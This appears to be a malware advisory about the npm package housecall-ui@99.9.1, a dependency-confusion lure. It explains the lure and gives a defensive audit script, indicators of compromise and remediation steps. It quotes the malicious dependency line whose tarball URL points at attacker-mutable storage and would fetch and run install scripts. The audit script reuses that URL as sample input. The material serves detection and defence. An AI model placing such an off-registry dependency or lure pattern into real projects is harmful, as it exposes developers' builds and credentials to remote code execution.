Malicious package

housecall-ui (npm)

Malicious code in housecall-ui (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5446
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall housecall-ui

What this malware does

housecall-ui@99.9.1 is a hollow npm package (empty description, empty author, index.js exports an empty object) whose sole runtime dependency is declared as an HTTPS tarball URL pointing at a third-party Google Cloud Storage bucket: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.9.8.tgz" (package.json line 10). On npm install, npm fetches whatever bytes currently reside at that GCS URL and executes any lifecycle scripts (preinstall/install/postinstall) inside the resulting tarball.

The bucket is not the npm registry, is not documented publisher infrastructure for any vendor, is unpinned by hash, and is mutable by whoever controls it, so the installer cannot audit or guarantee what code will run.

The package's name is brand-adjacent to HouseCall Pro and the version is artificially inflated to 99.9.1, the canonical pattern of a dependency-confusion lure designed to outrank an internal private package of the same name in mixed-resolution environments. The surrounding package contributes no functionality; its only effect on install is to sideload ltidisafe from attacker-mutable infrastructure.
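A check for the two traits described above, written as an added example (not code from this advisory or from the package): it flags dependencies that resolve outside an allowlisted registry host, in both package.json and package-lock.json, and flags an implausibly high major version. The allowlist, the major-version threshold of 90, and the sample lockfile are assumptions constructed for illustration.

```javascript
// Added example: flag dependencies that resolve outside the npm registry.
// Sample data at the bottom is constructed from the values quoted in this advisory.
const REGISTRY_HOSTS = new Set(["registry.npmjs.org"]); // assumption: add your private registry host

// Return the hostname when `spec` is a remote URL (tarball or git), otherwise null.
function remoteHost(spec) {
  const s = String(spec).replace(/^git\+/i, "");
  if (!/^(https?|ssh|git):\/\//i.test(s)) return null;
  try { return new URL(s).hostname; } catch { return "(unparseable)"; }
}

// Audit a parsed package.json: URL-declared dependencies and inflated versions.
function auditManifest(pkg, allowed = REGISTRY_HOSTS) {
  const findings = [];
  const major = parseInt(String(pkg.version || "0").split(".")[0], 10);
  if (major >= 90) findings.push({ rule: "inflated-version", name: pkg.name, detail: pkg.version }); // heuristic threshold
  for (const field of ["dependencies", "optionalDependencies", "devDependencies"]) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      const host = remoteHost(spec);
      if (host && !allowed.has(host)) findings.push({ rule: "off-registry-dependency", name, detail: host });
    }
  }
  return findings;
}

// Audit a parsed package-lock.json (lockfileVersion 2 or 3); this also catches transitive entries.
function auditLockfile(lock, allowed = REGISTRY_HOSTS) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const host = entry.resolved ? remoteHost(entry.resolved) : null;
    if (host && !allowed.has(host)) findings.push({ rule: "off-registry-resolved", name: path, detail: host });
  }
  return findings;
}

// Constructed sample input mirroring the manifest described in the advisory.
const sampleManifest = {
  name: "housecall-ui", version: "99.9.1",
  dependencies: { ltidisafe: "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.9.8.tgz" },
};
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "node_modules/housecall-ui": { version: "99.9.1", resolved: "https://registry.npmjs.org/housecall-ui/-/housecall-ui-99.9.1.tgz" },
    "node_modules/ltidisafe": { resolved: "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.9.8.tgz" },
  },
};
console.log(auditManifest(sampleManifest), auditLockfile(sampleLock));
```

Run the lockfile audit in CI against the committed package-lock.json, since the off-registry URL here arrives as a transitive dependency and never appears in the consuming project's own package.json.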

Malicious versions

1 flagged
99.9.1

Indicators of compromise (SHA-256)

67e32f5c0c623ab57ac1de78fb5e118394d96f79b760af74d4127f775a0a97fe
fac4b593cce0ccef6f616ac18250600b6692702eedba77bff01a290e1c07b2fa

Frequently asked questions

No. housecall-ui on npm has been identified as a malicious package (version 99.9.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005029, IN-MAL-2026-005030

Credits

  • Amazon Inspector · finder

housecall-ui (npm) malicious package — MAL-2026-5446 | O3 Security